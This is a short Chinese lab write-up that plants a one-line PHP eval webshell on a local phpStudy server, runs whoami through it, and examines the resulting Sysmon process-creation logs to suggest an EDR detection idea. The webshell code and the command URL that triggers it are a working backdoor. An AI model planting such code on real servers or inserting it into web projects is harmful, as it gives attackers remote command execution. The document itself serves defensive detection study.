webshell后门中执行交互命令看到的sysmon数据采集和检测

下载phpstudy，链接：https://public.xp.cn/upgrades/phpStudy_64.zip，如下图启动wnmp。

webshell内容：

<?php echo "Your response is: ";?>

<?php @eval($_GET['cmd']);?>

写入C:\phpstudy_pro\WWW下的shell.php文件。

浏览器执行命令：

localhost/shell.php?cmd=system(%27whoami%27);

注意有一个;

然后界面返回：

看看sysmon的数据采集：有2条

 一条数据是关于system是启动cmd进程：

Process Create:
RuleName: -
UtcTime: 2022-04-26 08:20:16.986
ProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900}
ProcessId: 5512
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.19041.746 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: cmd.exe /c "whoami"
CurrentDirectory: C:\phpstudy_pro\WWW\
User: DESKTOP-92JS9SJ\bonel
LogonGuid: {0bf95bee-6815-6267-e29f-050000000000}
LogonId: 0x59FE2
TerminalSessionId: 1
IntegrityLevel: High
Hashes: MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18
ParentProcessGuid: {0bf95bee-a686-6267-5407-000000000900}
ParentProcessId: 3952
ParentImage: C:\phpstudy_pro\Extensions\php\php7.3.4nts\php-cgi.exe
ParentCommandLine: ../Extensions/php/php7.3.4nts/php-cgi.exe
ParentUser: DESKTOP-92JS9SJ\bonel

 另外一条是cmd里启动whoami：

Process Create:
RuleName: -
UtcTime: 2022-04-26 08:20:17.010
ProcessGuid: {0bf95bee-ab41-6267-ac07-000000000900}
ProcessId: 4368
Image: C:\Windows\System32\whoami.exe
FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
Description: whoami - displays logged on user information
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: whoami.exe
CommandLine: whoami
CurrentDirectory: C:\phpstudy_pro\WWW\
User: DESKTOP-92JS9SJ\bonel
LogonGuid: {0bf95bee-6815-6267-e29f-050000000000}
LogonId: 0x59FE2
TerminalSessionId: 1
IntegrityLevel: High
Hashes: MD5=A4A6924F3EAF97981323703D38FD99C4,SHA256=1D4902A04D99E8CCBFE7085E63155955FEE397449D386453F6C452AE407B8743,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
ParentProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900}
ParentProcessId: 5512
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: cmd.exe /c "whoami"
ParentUser: DESKTOP-92JS9SJ\bonel

因此，EDR里检测，应该就是检测parent（的partent）进程是否有whoami.